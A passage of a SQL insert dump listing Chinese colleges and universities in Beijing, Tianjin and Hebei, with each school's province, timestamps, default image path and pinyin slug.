17:40:33','/images/school/default.png','beijingfuzhuangxueyuan',0,NULL,NULL,0,NULL,NULL),(163,'北京印刷学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingyinshuaxueyuan',0,NULL,NULL,0,NULL,NULL),(164,'北京石油化工学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingshiyouhuagongxueyuan',0,NULL,NULL,0,NULL,NULL),(165,'北京农学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingnongxueyuan',0,NULL,NULL,0,NULL,NULL),(166,'首都体育学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','shoudutiyuxueyuan',0,NULL,NULL,0,NULL,NULL),(167,'北京第二外国语学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingdierwaiguoyuxueyuan',0,NULL,NULL,0,NULL,NULL),(168,'北京物资学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingwuzixueyuan',0,NULL,NULL,0,NULL,NULL),(169,'中国音乐学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','zhongguoyinlexueyuan',0,NULL,NULL,0,NULL,NULL),(170,'中国戏曲学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','zhongguoxiquxueyuan',0,NULL,NULL,0,NULL,NULL),(171,'北京电影学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingdianyingxueyuan',0,NULL,NULL,0,NULL,NULL),(172,'北京舞蹈学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingwudaoxueyuan',0,NULL,NULL,0,NULL,NULL),(173,'北京城市学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingchengshixueyuan',0,NULL,NULL,0,NULL,NULL),(174,'首钢工学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','shouganggongxueyuan',0,NULL,NULL,0,NULL,NULL),(175,'北京警察学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingjingchaxueyuan',0,NULL,NULL,0,NULL,NULL),(176,'北京青年政治学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingqingnianzhengzhixueyuan',0,NULL,NULL,0,NULL,NULL),(177,'北京工业职业技术学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijinggongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(178,'北京信息职业技术学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingxinxizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(179,'北京电子科技职业学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingdianzikejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(180,'北京吉利大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingjilidaxue',0,NULL,NULL,0,NULL,NULL),(181,'北京社会管理职业学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingshehuiguanlizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(182,'北京新圆明职业学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingxinyuanmingzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(183,'北京体育职业学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingtiyuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(184,'北京交通运输职业学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingjiaotongyunshuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(185,'北京卫生职业学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingweishengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(186,'北京京北职业技术学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingjingbeizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(187,'北京交通职业技术学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingjiaotongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(188,'北京农业职业学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingnongyezhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(189,'北京政法职业学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingzhengfazhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(190,'北京财贸职业学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingcaimaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(191,'北京北大方正软件职业技术学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingbeidafangzhengruanjianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(192,'北京经贸职业学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingjingmaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(193,'北京经济技术职业学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingjingjijishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(194,'北京戏曲艺术职业学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingxiquyishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(195,'北京汇佳职业学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijinghuijiazhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(196,'北京现代职业技术学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingxiandaizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(197,'北京科技经营管理学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingkejijingyingguanlixueyuan',0,NULL,NULL,0,NULL,NULL),(198,'北京科技职业学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingkejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(199,'北京培黎职业学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingpeilizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(200,'北京经济管理职业学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingjingjiguanlizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(201,'北京劳动保障职业学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijinglaodongbaozhangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(202,'南开大学','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','nankaidaxue',0,NULL,NULL,0,NULL,NULL),(203,'天津大学','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjindaxue',0,NULL,NULL,0,NULL,NULL),(204,'中国民航大学','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','zhongguominhangdaxue',0,NULL,NULL,0,NULL,NULL),(205,'天津科技大学','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinkejidaxue',0,NULL,NULL,0,NULL,NULL),(206,'天津工业大学','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjingongyedaxue',0,NULL,NULL,0,NULL,NULL),(207,'天津理工大学','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinligongdaxue',0,NULL,NULL,0,NULL,NULL),(208,'天津医科大学','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinyikedaxue',0,NULL,NULL,0,NULL,NULL),(209,'天津中医药大学','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinzhongyiyaodaxue',0,NULL,NULL,0,NULL,NULL),(210,'天津师范大学','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinshifandaxue',0,NULL,NULL,0,NULL,NULL),(211,'天津职业技术师范大学','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinzhiyejishushifandaxue',0,NULL,NULL,0,NULL,NULL),(212,'天津外国语大学','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinwaiguoyudaxue',0,NULL,NULL,0,NULL,NULL),(213,'天津商业大学','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinshangyedaxue',0,NULL,NULL,0,NULL,NULL),(214,'天津财经大学','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjincaijingdaxue',0,NULL,NULL,0,NULL,NULL),(215,'天津城建大学','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinchengjiandaxue',0,NULL,NULL,0,NULL,NULL),(216,'天津农学院','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinnongxueyuan',0,NULL,NULL,0,NULL,NULL),(217,'天津体育学院','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjintiyuxueyuan',0,NULL,NULL,0,NULL,NULL),(218,'天津音乐学院','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinyinlexueyuan',0,NULL,NULL,0,NULL,NULL),(219,'天津美术学院','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinmeishuxueyuan',0,NULL,NULL,0,NULL,NULL),(220,'天津天狮学院','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjintianshixueyuan',0,NULL,NULL,0,NULL,NULL),(221,'天津医学高等专科学校','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinyixuegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(222,'天津市职业大学','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinshizhiyedaxue',0,NULL,NULL,0,NULL,NULL),(223,'天津商务职业学院','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinshangwuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(224,'天津广播影视职业学院','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinguangboyingshizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(225,'天津中德职业技术学院','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinzhongdezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(226,'天津滨海职业学院','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinbinhaizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(227,'天津工程职业技术学院','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjingongchengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(228,'天津青年职业学院','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinqingnianzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(229,'天津渤海职业技术学院','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinbohaizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(230,'天津电子信息职业技术学院','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjindianzixinxizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(231,'天津机电职业技术学院','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinjidianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(232,'天津现代职业技术学院','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinxiandaizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(233,'天津公安警官职业学院','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjingonganjingguanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(234,'天津轻工职业技术学院','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinqinggongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(235,'天津国土资源和房屋职业学院','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinguotuziyuanhefangwuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(236,'天津开发区职业技术学院','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinkaifaquzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(237,'天津艺术职业学院','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinyishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(238,'天津交通职业学院','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinjiaotongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(239,'天津冶金职业技术学院','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinyejinzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(240,'天津石油职业技术学院','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinshiyouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(241,'天津城市职业学院','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinchengshizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(242,'天津铁道职业技术学院','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjintiedaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(243,'天津工艺美术职业学院','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjingongyimeishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(244,'天津城市建设管理职业技术学院','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinchengshijiansheguanlizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(245,'天津生物工程职业技术学院','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinshengwugongchengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(246,'天津海运职业学院','天津市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tianjinhaiyunzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(247,'河北大学','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','hebeidaxue',0,NULL,NULL,0,NULL,NULL),(248,'河北工程大学','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','hebeigongchengdaxue',0,NULL,NULL,0,NULL,NULL),(249,'河北工业大学','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','hebeigongyedaxue',0,NULL,NULL,0,NULL,NULL),(250,'河北联合大学','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','hebeilianhedaxue',0,NULL,NULL,0,NULL,NULL),(251,'河北科技大学','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','hebeikejidaxue',0,NULL,NULL,0,NULL,NULL),(252,'河北农业大学','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','hebeinongyedaxue',0,NULL,NULL,0,NULL,NULL),(253,'河北医科大学','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','hebeiyikedaxue',0,NULL,NULL,0,NULL,NULL),(254,'河北师范大学','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','hebeishifandaxue',0,NULL,NULL,0,NULL,NULL),(255,'石家庄铁道大学','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','shijiazhuangtiedaodaxue',0,NULL,NULL,0,NULL,NULL),(256,'燕山大学','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','yanshandaxue',0,NULL,NULL,0,NULL,NULL),(257,'河北经贸大学','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','hebeijingmaodaxue',0,NULL,NULL,0,NULL,NULL),(258,'中国人民武装警察部队学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','zhongguorenminwuzhuangjingchabuduixueyuan',0,NULL,NULL,0,NULL,NULL),(259,'中央司法警官学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','zhongyangsifajingguanxueyuan',0,NULL,NULL,0,NULL,NULL),(260,'防灾科技学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','fangzaikejixueyuan',0,NULL,NULL,0,NULL,NULL),(261,'华北科技学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','huabeikejixueyuan',0,NULL,NULL,1,NULL,'2018-01-01 10:00:00'),(262,'石家庄经济学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','shijiazhuangjingjixueyuan',0,NULL,NULL,0,NULL,NULL),(263,'河北建筑工程学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','hebeijianzhugongchengxueyuan',0,NULL,NULL,0,NULL,NULL),(264,'河北北方学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','hebeibeifangxueyuan',0,NULL,NULL,0,NULL,NULL),(265,'承德医学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','chengdeyixueyuan',0,NULL,NULL,0,NULL,NULL),(266,'保定学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','baodingxueyuan',0,NULL,NULL,0,NULL,NULL),(267,'河北民族师范学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','hebeiminzushifanxueyuan',0,NULL,NULL,0,NULL,NULL),(268,'唐山师范学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tangshanshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(269,'廊坊师范学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','langfangshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(270,'衡水学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','hengshuixueyuan',0,NULL,NULL,0,NULL,NULL),(271,'石家庄学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','shijiazhuangxueyuan',0,NULL,NULL,0,NULL,NULL),(272,'邯郸学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','handanxueyuan',0,NULL,NULL,0,NULL,NULL),(273,'邢台学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','xingtaixueyuan',0,NULL,NULL,0,NULL,NULL),(274,'沧州师范学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','cangzhoushifanxueyuan',0,NULL,NULL,0,NULL,NULL),(275,'河北科技师范学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','hebeikejishifanxueyuan',0,NULL,NULL,0,NULL,NULL),(276,'唐山学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','tangshanxueyuan',0,NULL,NULL,0,NULL,NULL),(277,'河北体育学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','hebeitiyuxueyuan',0,NULL,NULL,0,NULL,NULL),(278,'河北金融学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','hebeijinrongxueyuan',0,NULL,NULL,0,NULL,NULL),(279,'北华航天工业学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beihuahangtiangongyexueyuan',0,NULL,NULL,0,NULL,NULL),(280,'河北美术学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','hebeimeishuxueyuan',0,NULL,NULL,0,NULL,NULL),(281,'河北科技学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','hebeikejixueyuan',0,NULL,NULL,0,NULL,NULL),(282,'河北外国语学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','hebeiwaiguoyuxueyuan',0,NULL,NULL,0,NULL,NULL),(283,'燕京理工学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','yanjingligongxueyuan',0,NULL,NULL,0,NULL,NULL),(284,'河北中医学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','hebeizhongyixueyuan',0,NULL,NULL,0,NULL,NULL),(285,'张家口学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','zhangjiakouxueyuan',0,NULL,NULL,0,NULL,NULL),(286,'河北传媒学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','hebeichuanmeixueyuan',0,NULL,NULL,0,NULL,NULL),(287,'河北工程技术学院','河北省','2014-04-23 00:00:00','2017-09-04 17:02:37','/images/school/default.png','hebeigongchengjishugaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(288,'承德石油高等专科学校','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','chengdeshiyougaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(289,'石家庄人民医学高等专科学校','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shijiazhuangrenminyixuegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(290,'石家庄幼儿师范高等专科学校','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shijiazhuangyouershifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(291,'保定幼儿师范高等专科学校','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','baodingyouershifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(292,'邢台医学高等专科学校','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','xingtaiyixuegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(293,'沧州医学高等专科学校','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','cangzhouyixuegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(294,'石家庄医学高等专科学校','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shijiazhuangyixuegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(295,'河北工业职业技术学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','hebeigongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(296,'邯郸职业技术学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','handanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(297,'石家庄职业技术学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shijiazhuangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(298,'张家口职业技术学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','zhangjiakouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(299,'邢台职业技术学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','xingtaizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(300,'石家庄工程职业学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shijiazhuanggongchengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(301,'石家庄城市经济职业学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shijiazhuangchengshijingjizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(302,'石家庄城市职业学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shijiazhuangchengshizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(303,'河北旅游职业学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','hebeilvyouzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(304,'石家庄财经职业学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shijiazhuangcaijingzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(305,'河北外国语职业学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','hebeiwaiguoyuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(306,'石家庄邮电职业技术学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shijiazhuangyoudianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(307,'石家庄理工职业学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shijiazhuangligongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(308,'石家庄经济职业学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shijiazhuangjingjizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(309,'冀中职业学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','jizhongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(310,'石家庄科技工程职业学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shijiazhuangkejigongchengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(311,'河北劳动关系职业学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','hebeilaodongguanxizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(312,'石家庄科技职业学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shijiazhuangkejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(313,'廊坊东方职业技术学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','langfangdongfangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(314,'泊头职业学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','botouzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(315,'宣化科技职业学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','xuanhuakejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(316,'廊坊燕京职业技术学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','langfangyanjingzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(317,'承德护理职业学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','chengdehulizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(318,'廊坊卫生职业学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','langfangweishengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(319,'河北轨道运输职业技术学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','hebeiguidaoyunshuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(320,'河北工艺美术职业学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','hebeigongyimeishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(321,'渤海理工职业学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','bohailigongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(322,'河北软件职业技术学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','hebeiruanjianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(323,'河北石油职业技术学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','hebeishiyouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(324,'河北建材职业技术学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','hebeijiancaizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(325,'河北政法职业学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','hebeizhengfazhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(326,'沧州职业技术学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','cangzhouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(327,'河北能源职业技术学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','hebeinengyuanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(328,'石家庄铁路职业技术学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shijiazhuangtieluzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(329,'保定职业技术学院','河北省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','baodingzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(330,'秦皇岛职业技术学院','河北省','2014-04-23 00:00:00','2015-10-16 